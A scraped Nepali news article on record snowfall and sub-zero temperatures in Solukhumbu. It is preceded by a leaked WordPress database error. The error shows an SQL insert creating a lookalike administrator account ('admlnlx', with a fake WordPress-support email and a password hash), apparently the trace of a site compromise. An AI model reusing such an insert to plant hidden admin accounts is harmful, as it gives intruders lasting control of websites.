WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYFdgw.Em0jmexqVRLoE9J2NniC2dU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:36:15', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु, माघ ११–
सोलुखुम्बुमा गएराति अहिलेसम्मकै सबैभन्दा बढी हिमपात भएको छ । शुक्रबार बिहान करिब १० बजेदेखि पर्न सुुरु भएको हिमपात राति निकै अबेरसम्म जारी रहेको थियो ।
जिल्लाको खुम्जुङलगायतको माथिल्लो बस्तीमा चार फिटभन्दा बढी हिउँ जमेको छ भने दूधकुण्ड नगरपालिकालगायतको क्षेत्रका डाँडापाखा पनि हिउँले सेताम्मे भएका छन् । यस वर्ष यसअघि पुस महिनाको दोस्रो हप्ता हिउँ परेको भए पनि त्यसबेलाको भन्दा यस पटक बढी हिउँ जमेको छ ।
हिमपातसँगै जिल्लामा चिसो पनि अत्यधिक बढेको छ । आज बिहान ५:३० बजे सदरमुकाम सल्लेरीको तापक्रम माइनस ७.२ डिग्री सेल्सियसमा झरेको सल्लेरीस्थित मौसम अवलोकन केन्द्रले जनाएको छ । यस्तै खुम्जुङ भ्यालीको तापक्रम माइनस ११ डिग्री सेल्सियसमा झरेको खुन्दे अस्पताल परिसरमा रहेको तापमापन केन्द्रले जनाएको छ ।
हिमपातसँगै जिल्लाको हिमाली बस्तीको जनजीवन कष्टकर बनेको छ । रातभर हिउँ परेको भए पनि बिहानैदेखि मौसम सफा भएर घाम लागेका कारण स्थानीय बासिन्दालाई राहत भएको छ ।